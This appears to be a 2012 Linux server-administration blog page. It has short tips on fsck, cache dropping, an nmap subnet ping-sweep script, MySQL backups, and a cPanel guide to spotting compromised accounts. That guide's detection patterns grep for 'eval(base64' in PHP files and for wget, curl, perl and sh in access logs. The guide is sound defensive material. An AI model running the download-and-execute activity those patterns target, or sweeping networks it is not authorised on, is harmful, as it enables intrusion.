UnixServerAdmin

Server Administration & Management

How to run a file system check on your next boot

The empty file /forcefsck causes the file system check fsck to be run next time you boot up, after which it will be removed.

# touch /forcefsck

March 31, 2012 Posted by | Tips & Tricks, Unix/Linux | , , , | Leave a comment

How to clean up cache memory of unnecessary things

First run sync first to flush useful things out to disk ! ! !

To free pagecache:

# echo 1 > /proc/sys/vm/drop_caches

To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches

To free pagecache, dentries and inodes:

# echo 3 > /proc/sys/vm/drop_caches

March 29, 2012 Posted by | Tips & Tricks, Unix/Linux | , , , | Leave a comment

network_scan.sh

#!/bin/bash
ip=$( ifconfig | grep “192.168” | cut -d: -f2  | awk ‘{print $1}’ )
echo
echo “Current IP Address of the box $ip”
sub=$( echo $ip | awk -F. ‘{print $3}’ )
echo
echo “Subnet used is 192.168.’$sub’.”
echo
echo “Checking for Computers Online on Local Network”
nmap -sP 192.168.$sub.0-255 | grep -v ‘MAC’ | awk ‘{print $2,$3}’

March 27, 2012 Posted by | Shell Script | | Leave a comment

How to remove spaces from file names with Linux

Usually Windows users like to add spaces in the file names, I prefer dashes (-) or under scores (_) instead, they are easy to manage in the console.

# for file in *; do mv “$file” `echo $file | sed -e ‘s/  */_/g’ -e ‘s/_-_/-/g’`; done

March 25, 2012 Posted by | Tips & Tricks, Unix/Linux | , | Leave a comment

index.jsp for tomcat cluster with HA

<%@ page language=”java” %>
<HTML>
<HEAD>
<TITLE>Login using jsp</TITLE>
</HEAD>
<BODY>
<h1><font color=”red”>Index Page by Tomcat-2 Node-2</font></h1>
<h2><font color=”blue”>This is test page of Tomcat-2 of NODE-2</font></h2>
<table> align=”centre” border=”1″
<h2>></h2>
<tr>
<td>Session ID –> </td>
<td><%= session.getId() %></td>
</tr>
<tr>
<td>Created on –> </td>
<td><%= session.getCreationTime() %></td>
</tr>
</table>
</BODY>
</HTML>

March 23, 2012 Posted by | Apache, Cluster, Tomcat | , , | Leave a comment

How to history command file united

Introduction

If you open a lot of terminal screens at once while working on Linux, you may have noticed that the commands you type in one terminal are not available in the other, and usually once you close all terminals, and open another again,
you will see that only the commands written in one of them (The first one opened before I think) are available in history.

That is not good if you need that command written in the terminal that got not saved in the History file, so, how to solve that?

Linux history file united

You will prefer to have just one history file, with all commands you typed in any ever opened terminal window,
to accomplish this just enter this command in your $HOME/.bashrc file.

# shopt -s histappend

That is it.

March 21, 2012 Posted by | Tips & Tricks, Unix/Linux | , , | Leave a comment

Protected: worker.properties_cluster

This content is password protected. To view it please enter your password below:

March 19, 2012 Posted by | Apache, Cluster, Tomcat | , , | Enter your password to view comments.

Protected: tomcat_ssl.conf_cluster

This content is password protected. To view it please enter your password below:

March 17, 2012 Posted by | Apache, Cluster, Tomcat | , , | Enter your password to view comments.

Protected: tomcat_httpd.conf_cluster

This content is password protected. To view it please enter your password below:

March 15, 2012 Posted by | Apache, Cluster, Tomcat | , , | Enter your password to view comments.

Protected: Tomcat Configuration Cluster

This content is password protected. To view it please enter your password below:

March 13, 2012 Posted by | Cluster, Tomcat | , | Enter your password to view comments.

Protected: How to install and configure LVS to allow Load Balancing between Clusters/Nodes

This content is password protected. To view it please enter your password below:

March 11, 2012 Posted by | Apache, Cluster, LVS | , , , , | Enter your password to view comments.

Protected: Hearbeat Configration File Options

This content is password protected. To view it please enter your password below:

March 9, 2012 Posted by | Apache, Cluster | , , | Enter your password to view comments.

Protected: How to install and configure Failover “OR” High Availability (HA) Cluster with heartbeat in Apache

This content is password protected. To view it please enter your password below:

March 7, 2012 Posted by | Apache, Cluster | , , , | Enter your password to view comments.

How to detect domain being Attacked or Attacking Out in cPanel

What we can do to find out which domain being attacked or attacking out from/to the server. Its no matter how this could happen, we need to stop that from happenning and turn our server stable. Its better to do this process in real-time within the  time frame of server being attacked or the server  others to make sure we can gather enough information, prove and logs. Its also recommended to document  your process of troubleshooting for your reference. Believe me you will need it in future.

As for me, I will do basic checking as below:

1. Check overall server load summary using top command:

# top -c

2. Using the same command, we can monitor which process has taken high resource usage by sorting memory (Shift+M) or sorting CPU usage (Shift+P)

3. Check the network and analyse which connection flooding your server. Following command might be useful:

3.1 Check and sort number of network statistics connected to the server:

# netstat -anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n

3.2 If you have APFinstalled and using kernel older than 2.6.20, you can check the connection tracking table:

# cat /proc/net/ip_conntrack | cut -d ‘ ‘ -f 10 | cut -d ‘=’ -f 2 | sort | uniq -c | sort -nr | head -n 10

3.3 Do tcpdump to analyse packet that transmitted from/to your server. Following command might help to analyse any connection to eth0interface port 53 (DNS):

# tcpdump -vvxXlnni eth0 port 53 | grep A? | awk -F? ‘{print $2}’

4. Analyse Apache status page at WHM –> Server Status –> Apache Status. To do this via command line, you can run following command:

# service httpd fullstatus

5. Analyse Daily process logs at WHM –> Server Status –> Daily Process Logs. Find any top 5 users which consume most CPU percentage, memory and SQL process

After that, we should see some suspected account/process/user which occupied much resources either on CPU, memory or network connections.
Up until this part, we should shorlist any suspected account.

Then from the suspected account, we should do any step advised as below:

6. Scan the public_html directory of suspected user with anti virus. We can use clamav, but make sure the virus definition is updated before we do this:

6.1 Update clamavvirus definition:

# freshclam

6.2 Scan the public_html directory of the suspected user recursively with scan result logged to scanlog.txt:

# cd /home/user/public_html

# clamscan -i -r -l scanlog.txt &

6.3 Analyse any suspected files found by clamav and quarantine them. Make sure the file cannot be executed by chmod it to 600

7. Find any PHP files which contain suspicious characteristic like base64 encoded and store it into text file called scan_base64.txt.
Following command might help:

# cd /home/user/public_html

# grep -lir “eval(base64” *.php >  scan_base64.txt

8. Scan the Apacheaccess log from raw log for any suspicious activities. Following command might help to find any scripting
activities happened in all domains via Apache:

# find /usr/local/apache/domlogs -exec egrep -iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20’ {} ;

9. Analysing AWstats and bandwidth usage also get more clues. Go to cPanel > suspected domain > Logs > Awstats.
In the AWstats page, check the Hosts, Pages-URL or any related section. Example as below:

There are various way to help you in executing this task. As for me, above said steps should be enough to detect any domain/account
which attacking out or being attacked. Different administrator might using different approach in order to produce same result.

March 5, 2012 Posted by | cPanel, Security | , , | Leave a comment

How to Backup and Restore large MySQL Database with Compression Method

If you have very large mysql database then it is very hard to backup and restore using the conventional phpmyadmin or any other programs.

To Backup MySQL Database

# mysqldump -u [username] -p [password] [dbname] > [backup.sql]

If your mysql database is very big, you might want to compress the output of mysql dump.

Just use the mysql backup command below and pipe the output to gzip, then you will get the output as gzip file.

# mysqldump -u [username] -p [password] [dbname] | gzip -9 > [backup.sql.gz]

To Restore MySQL Database, you need to create the database in target machine then use this command

# mysql -u [username] -p [password] [dbname] < [backup.sql]

Restore Compressed MySQL Database

# gunzip < [backup.sql.gz] | mysql -u [username] -p [password] [dbname]

March 3, 2012 Posted by | MySQL | , | Leave a comment

How to send a message to all users on linux system

To send a message to all login users on linux system, you can use wall command, which sends a message to everybody logged in with their message  permission set to yes. The message can be given as an argument to wall, or it can be sent to wall’s standard input. When using the standard input from a terminal, the message should be terminated with the EOF key (usually Control-D).

Examples
To send a message “Alert, Please disconnect from Server !”, type the following command

# wall
Alert, Please disconnect from Server !

When the message content is complete, press Control-D (CTRL+D) to send message to all users.

To display message “Alert, Please disconnect from Server !” to all admin group member use wall command with “–g” option as follows:

# wall -g admin
Alert, Please disconnect from Server !

When the message content is complete, press Control-D (CTRL+D) to send message to all users.

March 1, 2012 Posted by | Tips & Tricks, Unix/Linux | , , | Leave a comment